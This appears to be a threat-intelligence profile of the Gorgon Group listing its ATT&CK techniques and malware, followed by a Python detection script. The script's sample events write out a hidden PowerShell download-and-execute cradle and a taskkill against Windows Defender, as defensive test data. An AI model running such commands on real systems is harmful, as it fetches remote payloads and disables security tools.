Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [1]

ID: G0078
Version: 1.1

Techniques Used

Domain | ID | Name | Use
Enterprise | T1059 | Command-Line Interface | Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.[1]
Enterprise | T1140 | Deobfuscate/Decode Files or Information | Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file.[1]
Enterprise | T1089 | Disabling Security Tools | Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command.[1]
Enterprise | T1106 | Execution through API | Gorgon Group malware can leverage the Windows API call CreateProcessA() for execution.[1]
Enterprise | T1112 | Modify Registry | Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\Software\Microsoft\Office\.[1]
Enterprise | T1086 | PowerShell | Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim's machine.[1]
Enterprise | T1093 | Process Hollowing | Gorgon Group malware can use process hollowing to inject one of its trojans into another process.[1]
Enterprise | T1055 | Process Injection | Gorgon Group malware can download a remote access tool, ShiftyBug, and inject it into another process.[1]
Enterprise | T1060 | Registry Run Keys / Startup Folder | Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.[1]
Enterprise | T1105 | Remote File Copy | Gorgon Group malware can download additional files from C2 servers.[1]
Enterprise | T1064 | Scripting | Gorgon Group has used macros in spearphishing attachments as well as executed VBScripts on victim machines.[1]
Enterprise | T1023 | Shortcut Modification | Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.[1]
Enterprise | T1193 | Spearphishing Attachment | Gorgon Group sent emails to victims with malicious Microsoft Office documents attached.[1]
Enterprise | T1065 | Uncommonly Used Port | Gorgon Group has used a variant of ShiftyBug that communicates with its C2 server over port 6666.[1]
Enterprise | T1204 | User Execution | Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.[1]
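Several of the behaviours listed above are concrete enough to hunt for in endpoint telemetry: taskkill aimed at Windows Defender, value writes under HKCU\Software\Microsoft\Office\, a Run key pointing at a .lnk file, a PowerShell download cradle launched through cmd.exe, and outbound connections to port 6666. The script below is an added example, not code from the ATT&CK page or from the cited report, that runs those heuristics over constructed Sysmon-style events. The Defender process names, the Office value names (VBAWarnings, AccessVBOM and the Protected View switches), the download-cradle keywords, the SID normalisation and every sample event are assumptions of the example; the report only names the broader behaviours, not these identifiers.

```python
import re

# Constructed Sysmon-style events (not telemetry from the Gorgon Group report):
# id 1 = process creation, id 13 = registry value set, id 3 = network connection.
# Paths, names and addresses are invented for this example.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.23/p.ps1')\""},
    {"id": 1, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /F /IM MsMpEng.exe"},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
     "details": "DWORD (0x00000001)"},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\user\AppData\Roaming\updater.lnk"},
    {"id": 3, "image": r"C:\Users\user\AppData\Roaming\svchost.exe",
     "dst_ip": "203.0.113.5", "dst_port": 6666},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "198.51.100.7", "dst_port": 443},
]

# Assumed indicator lists: the report names Windows Defender, Office security keys,
# Run keys, .lnk files and port 6666, but not these exact process or value names.
DEFENDER_PROCS = {"msmpeng.exe", "nissrv.exe", "mssense.exe"}
OFFICE_SECURITY_VALUES = {"vbawarnings", "accessvbom", "disableinternetfilesinpv",
                          "disableunsafelocationsinpv", "disableattachmentsinpv"}
SHIFTYBUG_PORT = 6666

OFFICE_KEY = re.compile(r"^HKCU\\Software\\Microsoft\\Office\\", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
POWERSHELL = re.compile(r"\bpowershell(?:\.exe)?\b|\bpwsh(?:\.exe)?\b", re.I)
USER_HIVE = re.compile(r"^HKU\\S-1-5-21(?:-\d+)+\\", re.I)


def basename(path):
    """Last path component, lower-cased (works for file paths and registry paths)."""
    return path.rsplit("\\", 1)[-1].lower()


def normalize_hive(target):
    """Sysmon logs per-user keys as HKU\\<SID>\\...; fold that to HKCU\\ so the
    rules can be written in the notation the report uses."""
    return USER_HIVE.sub(lambda _: "HKCU\\", target)


def classify(event):
    """Return [(technique_id, reason), ...] for one event; empty list if nothing matched."""
    hits = []
    if event["id"] == 1:
        image, cmd = basename(event["image"]), event.get("cmdline", "")
        if DOWNLOAD_CRADLE.search(cmd):
            if image in ("powershell.exe", "pwsh.exe") or POWERSHELL.search(cmd):
                hits.append(("T1086", "PowerShell download-and-execute cradle"))
            if image == "cmd.exe":
                hits.append(("T1059", "cmd.exe used to launch the download"))
        if image == "taskkill.exe":
            killed = {t.strip('"').lower() for t in re.findall(r"/im\s+(\S+)", cmd, re.I)}
            if killed & DEFENDER_PROCS:
                hits.append(("T1089", "taskkill against Windows Defender: "
                             + ", ".join(sorted(killed & DEFENDER_PROCS))))
    elif event["id"] == 13:
        target = normalize_hive(event["target"])
        value = basename(target)
        if OFFICE_KEY.match(target) and value in OFFICE_SECURITY_VALUES:
            hits.append(("T1112", "Office security setting changed: " + value))
        if RUN_KEY.search(target):
            hits.append(("T1060", "Run key set: " + target))
            if event.get("details", "").lower().endswith(".lnk"):
                hits.append(("T1023", "Run key points at a .lnk file"))
    elif event["id"] == 3:
        if event.get("dst_port") == SHIFTYBUG_PORT:
            hits.append(("T1065", f"outbound {event['dst_ip']}:{SHIFTYBUG_PORT} "
                                  f"from {basename(event['image'])}"))
    return hits


def detect(events):
    """Run classify over a sequence; return (event_index, technique_id, reason) triples."""
    return [(i, tid, why) for i, ev in enumerate(events) for tid, why in classify(ev)]


if __name__ == "__main__":
    for idx, tid, why in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {tid} {why}")
```

Two caveats for anyone turning this into a production rule: the destination port alone is a weak signal (plenty of legitimate software uses 6666), so the T1065 hit should be joined with the process path or prevalence data before it pages anyone; and the Office value names and version segment (16.0 here) differ across Office releases, so the value set should be kept per environment rather than copied from the example.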

Software

ID | Name | References | Techniques
S0336 | NanoCore | [1] | Audio Capture, Command-Line Interface, Disabling Security Tools, Input Capture, Modify Registry, Obfuscated Files or Information, Registry Run Keys / Startup Folder, Remote File Copy, Scripting, Standard Cryptographic Protocol, System Network Configuration Discovery, Uncommonly Used Port, Video Capture
S0262 | QuasarRAT | [1] | Code Signing, Command-Line Interface, Connection Proxy, Credential Dumping, Credentials in Files, Input Capture, Masquerading, Modify Registry, Remote Desktop Protocol, Remote File Copy, Scheduled Task, Standard Cryptographic Protocol, System Information Discovery, Video Capture
S0332 | Remcos | [1] | Audio Capture, Bypass User Account Control, Clipboard Data, Command-Line Interface, Connection Proxy, File and Directory Discovery, Input Capture, Modify Registry, Obfuscated Files or Information, Process Injection, Registry Run Keys / Startup Folder, Remote File Copy, Screen Capture, Scripting, Video Capture, Virtualization/Sandbox Evasion